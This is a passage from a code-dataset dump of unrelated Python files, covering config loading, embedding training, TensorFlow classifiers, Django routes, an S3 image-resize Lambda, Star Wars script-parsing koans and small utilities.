-\n\n\n","sub_path":"code/0100_clean_dataset.py","file_name":"0100_clean_dataset.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"300039498","text":"import json\nimport os\nfrom pathlib import Path\nfrom string import Template\n\n\ndef get_default_config():\n base_path = Path(__file__).parent.parent\n return base_path / \"configs\" / \"basic.json\"\n\n\ndef get_config(path):\n with open(path) as stream:\n template = Template(stream.read())\n\n try:\n source = template.substitute(os.environ)\n except KeyError as key_error:\n [key] = key_error.args\n raise ValueError(f\"Missing configuration value: {key}\") from key_error\n else:\n return json.loads(source)\n\n\nconfig = get_config(os.getenv(\"DVC_BENCH_CONFIG\", get_default_config()))\n","sub_path":"benchmarks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63064353","text":"import unittest\n#fungsi\nclass Nyapa(unittest.TestCase):\n \n def __init__(self, nama):\n self.nama = nama\n\n self.assertIs(self.nama, 'John') #asserIs untuk String, .assertIs(a, b)\n\n print('Hallo, '+ self.nama)\n #print(\"Hallo, \" + nama) #print(\"Hallo, \", nama) <-- kedetek sebagai array... jadi nanti hasilnya ada kurung & tanda petik\n\n\n#f_hello('kobra') .assertIs(a, b)\n\nsapa1 = Nyapa('John')\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"novice/02-02/kasus/kasus1.py","file_name":"kasus1.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70146052","text":"from gensim.models import word2vec\nimport numpy as np\nimport sklearn.decomposition\nimport pandas as pd\nimport sys\n\nif __name__ == \"__main__\":\n\n\tword, n = sys.argv[1], int(sys.argv[2])\n\n\tmodel = word2vec.Word2Vec.load(\"./model_500_5.model\")\n\tsimilar_words = model.most_similar(positive=[word], topn = n)\n\n\tdata,words, sim = np.zeros((n, 500)),[],[]\n\n\ti=0\n\tfor word, similarity in similar_words:\n\t\twords.append(word)\n\t\tsim.append(similarity)\n\t\tdata[i] = model[word]\n\t\ti+=1\n\n\tdim = 2\n\tpca = sklearn.decomposition.PCA(dim)\n\n\tresult = pca.fit_transform(data)\n\n\tdf = pd.DataFrame({\"第1主成分\":result[:,0],\"第2主成分\":result[:,1],\"similarity\":sim}, index=words)\n\n\tprint(df)\n\n\tdf.to_csv(\"./d.csv\")\n\n\n\n","sub_path":"word2vec/make2dim.py","file_name":"make2dim.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"75297325","text":"\nfrom functools import partial\nimport logging\n\nfrom ..common import Handler\n\n\nclass AGISession(object):\n\n proto = None\n logger = logging.getLogger(__name__)\n\n def session_established(self):\n \"\"\"\n Called when the AGI session is established.\n \"\"\"\n\n def session_finished(self):\n \"\"\"\n Called when the AGI session is torn down.\n \"\"\"\n\n def run_coroutine(self, gen):\n handler = next(gen)\n self._bind_coroutine_handler(gen, handler)\n\n def _bind_coroutine_handler(self, gen, handler):\n if not isinstance(handler, Handler):\n raise TypeError(handler.__class__)\n handler.on_result = partial(self._on_coroutine_result, gen, True)\n handler.on_exception = partial(self._on_coroutine_result, gen, False)\n\n def _on_coroutine_result(self, gen, is_success, result):\n try:\n if is_success:\n handler = gen.send(result)\n else:\n handler = gen.throw(result)\n except StopIteration:\n gen.close()\n else:\n self._bind_coroutine_handler(gen, handler)\n","sub_path":"obelus/agi/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"577399920","text":"#!c:\\Program Files (x86)\\Python33\\python.exe -tt\n\nimport sys\nimport random\nimport time\n\ndef main():\n\tif len(sys.argv) < 3:\n\t\tprint('Usage: randgen.py num filename')\n\t\tsys.exit(1)\n\n\tloopend = int(sys.argv[1])\n\tlow = 999999\n\thigh = 10000000\n\trandlist = []\n\t\n\tst = time.time()\n\tprint('Start time: ', st)\n\n\ti = 0\n\twhile i < loopend:\n\t\tm = random.randrange(low, high)\n\t\tif m != 0:\n\t\t\trandlist.append(m)\n\t\ti = i + 1\n\n\tet1 = time.time()\n\tprint('End time1 (Gen', loopend, 'random data): ', et1, end = ';\\t')\n\tprint('Durtime: ', (et1 -st))\n\n\tfile = open(sys.argv[2], 'w')\n\n\ti = 0\n\twhile i < len(randlist):\n\t\tfile.write(str(randlist[i]))\n\t\tfile.write(';')\n\t\ti = i + 1\n\n\tfile.close()\n\n\tet2 = time.time()\n\tprint('End time2 (Write', loopend, 'random data into file): ', et2, end = ';\\t')\n\tprint('Durtime: ', (et2 -et1))\n\n\treturn\n\nif __name__ == '__main__':\n main()\n","sub_path":"fromPythonTur/sorting/randgen.py","file_name":"randgen.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"493786614","text":"import os\nimport sys\nimport time\nimport nltk\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom contextlib import contextmanager\nfrom gensim.models import word2vec, KeyedVectors, FastText\nfrom keras.preprocessing.text import text_to_word_sequence\n\nsys.path.append(\"../input/toxic-src\")\nfrom logger import setup_logger, LOGGER\n\n\n# ===============\n# Constants\n# ===============\nSAVE_DIR = \"./\"\nDATA_DIR = \"../input/jigsaw-unintended-bias-in-toxicity-classification\"\nLOGGER_PATH = os.path.join(SAVE_DIR, \"log.txt\")\nTRAIN_PATH = os.path.join(DATA_DIR, \"train.csv\")\nTEST_PATH = os.path.join(DATA_DIR, \"test.csv\")\nSUB_PATH = os.path.join(DATA_DIR, \"sample_submission.csv\")\nFASTTEXT_PATH = '../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec'\nGLOVE_PATH = '../input/glove.840B.300d.pkl'\nps = nltk.stem.PorterStemmer()\nlc = nltk.stem.lancaster.LancasterStemmer()\nsb = nltk.stem.snowball.SnowballStemmer('english')\n\n\n# ===============\n# Settings\n# ===============\nw2v_params = {\n \"size\": 300,\n \"iter\": 5,\n \"seed\": 0,\n \"min_count\": 1,\n \"workers\": 1\n}\nsave_path = \"exp5_fasttext_finetune_nopreprocess\"\nsetup_logger(out_file=LOGGER_PATH)\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n LOGGER.info(f'[{name}] done in {time.time() - t0:.0f} s')\n\n\ndef get_coefs(word, *arr): return word, np.asarray(arr, dtype='float32')\n\n\ndef load_embeddings(embed_dir):\n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embed_dir, encoding=\"utf8\"))\n return embedding_index\n\ndef load_embeddings_pickle(embed_dir):\n with open(embed_dir, 'rb') as f:\n embedding_index = pickle.load(f)\n return embedding_index\n\n\ndef load_embedding(embeddings_index, model, embedding_dim=300):\n words = model.wv.index2entity\n\n embedding_matrix = np.zeros((len(words), embedding_dim))\n\n for i, word in enumerate(words):\n if word in embeddings_index:\n embedding_matrix[i] = embeddings_index[word]\n continue\n word_ = word.upper()\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = word.capitalize()\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = ps.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = lc.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = sb.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n try:\n embedding_matrix[i] = embeddings_index[\"unkown\"]\n except:\n continue\n\n return embedding_matrix\n\n\ndef train_w2v(train_text, w2v_params, save_path, embeddings_indexes):\n train_corpus = [text_to_word_sequence(text) for text in train_text]\n\n model = FastText(**w2v_params)\n model.build_vocab(train_corpus)\n\n embedding_matrix = [load_embedding(embeddings_index, model) for embeddings_index in embeddings_indexes]\n embedding_matrix = np.mean(embedding_matrix, axis=0)\n model.wv.vectors[:] = embedding_matrix\n model.trainables.syn1neg[:] = embedding_matrix\n model.train(train_corpus, total_examples=len(train_corpus), epochs=model.epochs)\n model.save(\"{}.model\".format(save_path))\n\n dic = {}\n for word in model.wv.vocab:\n dic[word] = model.wv[word]\n with open(\"{}.pkl\".format(save_path), 'wb') as f:\n pickle.dump(dic, f)\n\n\nif __name__ == '__main__':\n train_df = pd.read_csv(TRAIN_PATH)\n test_df = pd.read_csv(TEST_PATH)\n train_df = train_df.append(test_df).reset_index(drop=True)\n\n with timer('train embeddings'):\n fasttext_index = load_embeddings(FASTTEXT_PATH)\n glove_index = load_embeddings_pickle(GLOVE_PATH)\n embeddings_indexes = [fasttext_index, glove_index]\n train_w2v(train_df['comment_text'], w2v_params, save_path, embeddings_indexes)\n","sub_path":"code/self_embedding/exp5.py","file_name":"exp5.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175527140","text":"import tensorflow as tf\n\naa = tf.constant([[2.0, 4], [3, 1]])\n\nbb = tf.expand_dims(aa, 2)\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nprint(sess.run(bb))","sub_path":"test/array_ops/expand_dims.py","file_name":"expand_dims.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619189342","text":"import datetime\n\nclass Group(object):\n def __init__(self, id: int, name: str, order: int, color: str):\n self.id = int(id)\n self.name = name\n self.order = int(order)\n self.color = color\n \n def toJson(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'order': self.order,\n 'color': self.color\n }\n \n @staticmethod\n def toJsonSet(groups):\n sets = []\n for note in groups:\n sets.append(note.toJson())\n return sets","sub_path":"app/Modules/Note/Models/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106805942","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets, layers, optimizers, Sequential, metrics\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n# 预处理函数\ndef preprocess(x, y):\n x = tf.cast(x, dtype=tf.float32)/255.\n y = tf.cast(y, dtype=tf.int32)\n return x, y\n\n\n# 获取fashionMnist数据集内容\n(x, y), (x_test, y_test) = datasets.fashion_mnist.load_data()\nprint(x.shape, y.shape)\n\nbatchsz = 128\n# 构造数据集\ndb = tf.data.Dataset.from_tensor_slices((x, y))\ndb = db.map(preprocess).shuffle(10000).batch(batchsz)\ndb_test = tf.data.Dataset.from_tensor_slices((x_test, y_test))\ndb_test = db_test.map(preprocess).batch(batchsz)\n\ndb_iter = iter(db)\nsample = next(db_iter)\nprint('batch:', sample[0].shape, sample[1].shape)\n\n# 新建一个网络 Sequential可以理解为一个容器\nmodel = Sequential([\n # 第一层为全连接层 [b, 784] => [b, 256]\n layers.Dense(256, activation=tf.nn.relu),\n # 第二层为全连接层 [b, 256] => [b, 128]\n layers.Dense(128, activation=tf.nn.relu),\n # 第三层为全连接层 [b, 128] => [b, 64]\n layers.Dense(64, activation=tf.nn.relu),\n # 第四层为全连接层 [b, 64] => [b, 32]\n layers.Dense(32, activation=tf.nn.relu),\n # 第五层为全连接层 [b, 32] => [b, 10]\n layers.Dense(10)\n])\n# 设置输入维度\nmodel.build(input_shape=[None, 28*28])\nmodel.summary()\n\n# 使用优化器\n# w = w - lr*grad\noptimizer = optimizers.Adam(lr=1e-3)\n\n\ndef main():\n\n for epoch in range(30):\n\n # 每一个epoch完成数据集的迭代\n for step, (x, y) in enumerate(db):\n\n # x:[b, 28, 28]\n # y:[b]\n x = tf.reshape(x, [-1, 28*28])\n # 求梯度的信息\n with tf.GradientTape() as tape:\n # 前向传播 [b, 784] => [b, 10]\n logits = model(x)\n # 对y值进行onehot encoding\n y_onehot = tf.one_hot(y, depth=10)\n # 均方差的计算 [b]\n loss_mse = tf.reduce_mean(tf.losses.MSE(y_onehot, logits))\n loss_ce = tf.losses.categorical_crossentropy(y_onehot, logits, from_logits=True) # 为了结果稳定,后面的参数需要设置\n loss_ce = tf.reduce_mean(loss_ce)\n\n # model.trainable_variables 可以返回一个w1,w2,w3...的列表,不需要人为整理\n grads = tape.gradient(loss_ce, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables)) # zip是将grads和model....中的元素拼接在一起\n\n if step % 100 == 0:\n print(epoch, step, 'loss:', float(loss_ce), float(loss_mse))\n\n # test\n total_correct = 0\n total_num = 0\n for x, y in db_test:\n\n # x:[b, 28, 28]\n # y:[b]\n x = tf.reshape(x, [-1, 28*28])\n # [b, 10]\n logits = model(x)\n # logits => prob, [b, 10]\n prob = tf.nn.softmax(logits, axis=1)\n # [b, 10] => [b], int64\n pred = tf.argmax(prob, axis=1)\n pred = tf.cast(pred, dtype=tf.int32)\n # pred:[b]\n # y: [b]\n correct = tf.equal(pred, y)\n correct = tf.reduce_sum(tf.cast(correct, dtype=tf.int32))\n\n total_correct += int(correct)\n total_num += x.shape[0]\n\n acc = total_correct / total_num\n print(epoch, 'test acc: ', acc)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"fashionMnist_Test01.py","file_name":"fashionMnist_Test01.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"68655508","text":"from django.conf.urls import url\nfrom management import views\n\nurlpatterns = [\n url(r'^$', views.index, name='homepage'),\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^set_password/$', views.set_password, name='set_password'),\n url(r'^add_book/$', views.add_book, name='add_book'),\n url(r'^add_computer/$', views.add_computer, name='add_computer'),\n url(r'^add_server/$', views.add_server, name='add_server'),\n url(r'^add_sparepart/$', views.add_spart, name='add_spart'),\n url(r'^add_idcinfo/$', views.add_idcinfo, name='add_idcinfo'),\n url(r'^add_img/$', views.add_img, name='add_img'),\n url(r'^add_user/$', views.signup, name='signup'),\n url(r'^view_book_list/$', views.view_book_list, name='view_book_list'),\n url(r'^view_computer_list/$', views.view_computer_list, name='view_computer_list'),\n url(r'^view_server_list/$', views.view_server_list, name='view_server_list'),\n url(r'^view_sparepart_list/$', views.view_spart_list, name='view_spart_list'),\n url(r'^view_idcinfo_list/$', views.view_idcinfo_list, name='view_idcinfo_list'),\n #url(r'^view_book/detail/$', views.detail, name='detail'),\n url(r'^cpudetail/', views.cpudetail, name='detail'),\n url(r'^serverdetail/', views.serverdetail, name='serverdetail'),\n url(r'^sparepartdetail/', views.spartdetail, name='spartdetail'),\n url(r'^modify_computer/', views.modify_computer, name='modify_computer'),\n url(r'^modify_server/', views.modify_server, name='modify_server'),\n url(r'^modify_sparepart/', views.modify_spart, name='modify_spart'),\n url(r'^up_idcinfo/', views.up_idcinfo, name='up_idcinfo'),\n url(r'^modify_idcinfo/', views.modify_idcinfo, name='modify_idcinfo'),\n url(r'^up_computer/', views.up_computer, name='up_computer'),\n url(r'^up_server/', views.up_server, name='up_server'),\n url(r'^up_spart/', views.up_spart, name='up_spart'),\n url(r'^delete_computer/', views.del_computer, name='del_computer'),\n url(r'^delete_server/', views.del_server, name='del_server'),\n url(r'^delete_sparepart/', views.del_spart, name='del_spart'),\n url(r'^delete_idcinfo/', views.del_idcinfo, name='del_idcinfo'),\n]\n","sub_path":"management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"627144808","text":"# to parse the url - s3 filename\n#import urllib.parse\n\n# os library\nimport os\n# create unique IDs \nimport uuid\n\n# import Image module from Pillow\nfrom PIL import Image \n\n# AWS SDK for python\nimport boto3\n\n# initialize the S3 object\ns3 = boto3.client('s3')\n \n\nprint('Loading image resize lambda function')\n\n\ndef resize_image(image_path, resized_path):\n with Image.open(image_path) as image:\n image.thumbnail((128, 128))\n image.save(resized_path)\n \n\ndef lambda_handler(event, context):\n # Let us print the event so that we can see how it looks \n print(event)\n \n # Get the triggering bucket name from the event \n bucket = event['Records'][0]['s3']['bucket']['name']\n print(bucket)\n\n #Get the file/key name from the event\n key = event['Records'][0]['s3']['object']['key']\n #key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n print('input filename that is to be processed is = ', key)\n \n # save the file in /tmp directory -- lambda provide /tmp directory for storage during the execution of function\n temp_save_path = '/tmp/{}{}'.format(uuid.uuid4(), key)\n print('temp_save_path ', temp_save_path)\n \n # create a resized filename \n temp_resize_path = '/tmp/resized-{}'.format(key)\n print('resized filename ', temp_resize_path)\n \n # Now dowload the file from s3 to /tmp directory\n s3.download_file(bucket, key, temp_save_path)\n print('Dirs in /tmp ', os.listdir('/tmp/'))\n \n # resize the image -- create image thumbnail\n resize_image(temp_save_path, temp_resize_path)\n print('Dirs in /tmp ', os.listdir('/tmp/'))\n\n # upload resized image to destination bucket\n dest_bucket = '{}-resized'.format(bucket)\n s3.upload_file(temp_resize_path,dest_bucket , key)\n \n print('Done with uploading file to dest bucket ', dest_bucket)","sub_path":"image-resizer-aws-lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526743515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nfrom collections import OrderedDict, Counter\nfrom functools import lru_cache\n\nfrom runner.koan import *\n\n# To run this koans we have to install several libraries\n# pip install lxml\nfrom lxml import html\n# pip install requests\nimport requests\n\n# pip install approvaltests\nfrom approvaltests.Approvals import verify\nfrom approvaltests.GenericDiffReporter import GenericDiffReporter\n\n\n# this is approval test verification code based on git diff\ndef diff_verify(result):\n json_result = json.dumps(result, indent=4, separators=(',', ': '))\n diff_path = 'C:/Program Files/Git/usr/bin/diff.exe' if os.name == 'nt' else '/usr/bin/diff'\n verify(json_result, GenericDiffReporter(('Custom', diff_path)))\n\n# link to script draft of Star Wars: a new hope\nURL = \"http://www.imsdb.com/scripts/Star-Wars-A-New-Hope.html\"\n\n\nclass AboutStarWars(Koan):\n \"\"\" Explore draft of Star Wars: a new hope using regex and XPath \"\"\"\n\n # loading page with script from internet\n @staticmethod\n @lru_cache(maxsize=None)\n def load_html_script_of_a_movie():\n # let's do HTTP GET with request library\n response = _____.___(URL)\n\n # what is expected HTTP OK status code\n # take a look here https://en.wikipedia.org/wiki/List_of_HTTP_status_codes\n if response.status_code == ___:\n return response.text\n else:\n assert False, \"can't load script from IMDB\"\n\n def test_perform_http_method_get_to_load_html(self):\n raw_html = AboutStarWars.load_html_script_of_a_movie()\n\n # now we have whole HTML page loaded, let verify it\n self.assertIsNotNone(raw_html)\n self.assertEqual(len(raw_html), _____)\n\n @staticmethod\n def load_raw_line_by_line_script_of_a_movie():\n tree = html.fromstring(AboutStarWars.load_html_script_of_a_movie())\n\n # you could yse browser's developers tools to find script\n # here is an example http://pasteboard.co/AWrJYwQho.png\n #\n # here is explanation how to test XPath expressions with Google Chrome\n # http://yizeng.me/2014/03/23/evaluate-and-validate-xpath-css-selectors-in-chrome-developer-tools/\n # same with Firefox\n # https://developer.mozilla.org/en-US/docs/Tools/Web_Console/Helpers\n #\n # here you need to select *all text* within
 ... 
\n movie_script = tree.xpath(_____)\n\n return movie_script\n\n def test_extracting_raw_script_from_html(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n\n # lets check number of lines and content\n self.assertEqual(len(movie_script), ____)\n diff_verify(movie_script)\n\n scene_name_regex = r'_____'\n role_name_regex = r'______'\n\n def test_extracting_all_scenes_from_html_using_re(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n diff_verify(self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex))\n\n @staticmethod\n def load_b_tags_only_line_by_line():\n tree = html.fromstring(AboutStarWars.load_html_script_of_a_movie())\n\n # could we simplify calculations by extracting only text from within ... tags?\n movie_script = tree.xpath(_____)\n\n return movie_script\n\n def test_extracting_names_from_html_using_xpath(self):\n b_tags_texts = AboutStarWars.load_b_tags_only_line_by_line()\n diff_verify(self.extracting_all_scenes_and_roles(b_tags_texts, self.scene_name_regex))\n\n def test_difference_between_two_results(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n b_tags_texts = AboutStarWars.load_b_tags_only_line_by_line()\n\n re_results = self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex)\n xpath_results = self.extracting_all_scenes_and_roles(b_tags_texts, self.scene_name_regex)\n\n # there should not be any difference between to results\n self.assertSetEqual(set(xpath_results) ^ set(re_results), set())\n\n def test_who_are_three_main_roles_by_number_of_phrases(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n re_results = self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex)\n\n top = Counter()\n\n for roles in re_results.values():\n top += Counter(roles)\n\n diff_verify(top.most_common(n=3))\n\n def test_there_are_important_characters_that_never_speak(self):\n \"\"\"\n here is homework *extra* challenge:\n there are important characters, but they never speak?\n who are they?\n \"\"\"\n\n role_names = __\n\n self.assertSetEqual(role_names, {__})\n\n @staticmethod\n def extracting_all_scenes_and_roles(movie_script, scene_name_regex, role_name_regex=r\".+\"):\n # I'd like to preserve chronological order of scenes and roles in scenes\n scenes = OrderedDict()\n\n current_scene_name = None\n\n scene_name_re = re.compile(scene_name_regex)\n role_name_re = re.compile(role_name_regex)\n\n for line in movie_script:\n line = line.strip()\n if scene_name_re.match(line):\n current_scene_name = line\n elif current_scene_name and role_name_re.match(line):\n role_name = line\n scene_counter = scenes.get(current_scene_name, OrderedDict())\n scene_counter[role_name] = scene_counter.get(role_name, 0) + 1\n scenes[current_scene_name] = scene_counter\n else:\n pass\n\n return scenes\n","sub_path":"python3/koans/about_starwars.py","file_name":"about_starwars.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307746515","text":"#!/usr/bin/env python\n\nfrom time import sleep\nfrom Adafruit_CharLCDPlate import Adafruit_CharLCDPlate\nfrom CharLCDScroll import Scroller\n\nclass CharLCD(Adafruit_CharLCDPlate):\n\t\t\n\tdef __init__(self, playermedia, playeroptions):\n\t\tAdafruit_CharLCDPlate.__init__(self)\n\t\tself._playermedia = playermedia\n\t\tself._playeroptions = playeroptions\n\t\tself._isPlayermediaFocus = True\n\n\t\tself._light = True\n\t\tself._colorIndex = 0\n\t\tself._colors = (('RED', self.RED), ('YELLOW', self.YELLOW), ('GREEN', self.GREEN), \\\n\t\t\t('TEAL', self.TEAL), ('BLUE', self.BLUE), ('VIOLET', self.VIOLET), \\\n\t\t\t('OFF', self.OFF), ('ON', self.ON))\n\n\t\t# map button with function\n\t\tself._buttons = (('SELECT', self.SELECT, self.button_select), ('UP', self.UP, self.button_up), \\\n\t\t\t('DOWN', self.DOWN, self.button_down), ('LEFT', self.LEFT, self.button_left), \\\n\t\t\t('RIGHT', self.RIGHT, self.button_right))\n\t\tself._buttonsFunction = playermedia.getActionButtons()\n\n\t\t# display lcd\n\t\tself._line1 = \"\"\n\t\tself._line2 = \"\"\n\t\tself._scroller = None\n\t\tself._sleeptimer = 50\n\t\tself.turn_on()\n\t\tself.update()\n\n\n\t# get push button call\n\tdef action_button(self):\n\t\tfor button in self._buttons:\n\t\t\tif self.buttonPressed(button[1]):\n\t\t\t\tif(self._light):\n\t\t\t\t\tself._sleeptimer = 50\n\t\t\t\t\tbutton[2]()\n\t\t\t\telse:\n\t\t\t\t\tself.turn_on()\n\n\t\t\t\tbreak\n\t\tsleep(0.1)\n\n\n\t# action for button up\n\tdef button_up(self):\n\t\tself._buttonsFunction['UP']()\n\t\tif(not self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\n\t\tself.update()\n\n\n\t# action for button down\n\tdef button_down(self):\n\t\tself._buttonsFunction['DOWN']()\n\t\tif(not self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\n\t\tself.update()\n\n\n\t# action for button left\n\tdef button_left(self):\n\t\tself._buttonsFunction['LEFT']()\n\n\n\t# action for button right\n\tdef button_right(self):\n\t\tself._buttonsFunction['RIGHT']()\n\n\n\t# action for button select\n\tdef button_select(self):\n\t\tif(self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\t\telse:\n\t\t\tself._buttonsFunction = self._playermedia.getActionButtons()\n\t\t\n\t\tself._isPlayermediaFocus = not(self._isPlayermediaFocus)\n\t\tself.update()\n\n\t# turn on lcd + backlight\n\tdef turn_on(self):\n\t\tself._light = True\n\t\tself._sleeptimer = 50\n\t\tself.backlight(self._colors[self._colorIndex][1])\n\t\tself.display()\n\n\n\t# turn off lcd + backlight\n\tdef turn_off(self):\n\t\tself._light = False\n\t\tself._sleeptimer = 0\n\t\tself._light = False\n\t\tself.backlight(self.OFF)\n\t\tself.noDisplay()\n\n\n\t# update the lcd display in function of the index page\n\tdef update(self):\n\t\ttext = \"\"\n\t\tself.clear()\n\n\t\tif(self._isPlayermediaFocus):\n\t\t\t(self._line1, self._line2) = self._playermedia.getText()\n\t\telse:\n\t\t\t(self._line1, self._line2) = self._playeroptions.getText()\n\t\t\n\t\tif(len(self._line1) > 16):\n\t\t\tself._scroller = Scroller(self._line1)\n\t\t\ttext = \"\\n\".join(( self.scroll(), self._line2 ))\n\t\telse:\n\t\t\ttext = \"\\n\".join(( self._line1, self._line2 ))\n\t\t\n\t\tself.message( text )\n\n\n\t\n\tdef refresh(self):\n\t\ttext = \"\"\n\t\tself.clear()\n\n\t\tif(self._isPlayermediaFocus):\n\t\t\tself._line2 = self._playermedia.getLine2()\n\t\telse:\n\t\t\tself._line2 = self._playeroptions.getLine2()\n\n\t\tif(len(self._line1) > 16):\n\t\t\ttext = \"\\n\".join(( self.scroll(), self._line2 ))\n\t\telse:\n\t\t\ttext = \"\\n\".join(( self._line1, self._line2 ))\n\t\t\n\t\tself.message( text )\n\t\n\n\n\tdef sleepTimerLess(self):\n\t\tself._sleeptimer -= 1\n\n\n\tdef getSleepTimer(self):\n\t\treturn self._sleeptimer\n\n\n\tdef scroll(self):\n\t\treturn self._scroller.scroll()\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\tfrom PlayerOptions import PlayerOptions\n\tfrom PlayerMedia import PlayerMedia\n\n\tplayermedia = PlayerMedia()\n\tplayoptions = PlayerOptions(playermedia)\n\tlcd = CharLCD(playermedia, playoptions)\n\n\ttry:\n\t\twhile True:\n\t\t\t# display message if backlight is on\n\t\t\tif lcd.getSleepTimer() < 0:\n\t\t\t\tlcd.turn_off()\t\n\t\t\telse:\n\t\t\t\tlcd.refresh()\n\t\t\t\tlcd.sleepTimerLess()\n\n\t\t\t# read button status\n\t\t\tlcd.action_button()\n\t\t\tsleep(0.2)\n\n\texcept KeyboardInterrupt:\n\t\tpass\n\n\tfinally:\n\t\tlcd.turn_off()\n","sub_path":"CharLCD.py","file_name":"CharLCD.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"584986732","text":"import sys\ninput = sys.stdin.readline\n\ns = input().rstrip()\nN = len(s)\ncnt=0\nfor i in range(len(s)-1):\n if s[i] != s[i+1]:\n cnt+=1\nif cnt%2:\n print(cnt//2+1)\nelse:\n print(cnt//2)","sub_path":"1439뒤집기.py","file_name":"1439뒤집기.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"488565540","text":"# https://tvax2.sinaimg.cn/large/006yt1Omgy1gbdu6ml01gj315o0ppb1w.jpg\n# https://tvax1.sinaimg.cn/large/006yt1Omgy1gbdtwie3fkj31e00xc1kx.jpg\nimport requests\nimport os\n\nurl = \"https://tvax2.sinaimg.cn/large/006yt1Omgy1gbdu6ml01gj315o0ppb1w.jpg\"\nroot = \"E://paper//\"\npath = root + url.split('/')[-1]\n\ntry:\n if not os.path.exists(root):\n os.mkdir(root)\n\n if not os.path.exists(path):\n r = requests.get(url=url)\n print(r.status_code)\n r.raise_for_status()\n with open(path, 'wb') as f:\n f.write(r.content)\n f.close()\n print(\"successful\")\n else:\n print(\"已存在\")\nexcept Exception as e:\n print(e)\n","sub_path":"Spider/spider/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"270551695","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# *{{ imports\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n# }}*\n\n# *{{ plot niceties\nmpl.rcParams['font.size'] = 16\nmpl.rcParams['xtick.major.pad'] = '10'\nmpl.rcParams['ytick.major.pad'] = '10'\n#plt.rc('text', usetex = True)\n#mpl.rcParams['text.latex.preamble'] = [r'\\usepackage{cmbright}']\n# }}*\n\n# test function to be plotted, params as args\ndef f(x, a, b):\n return 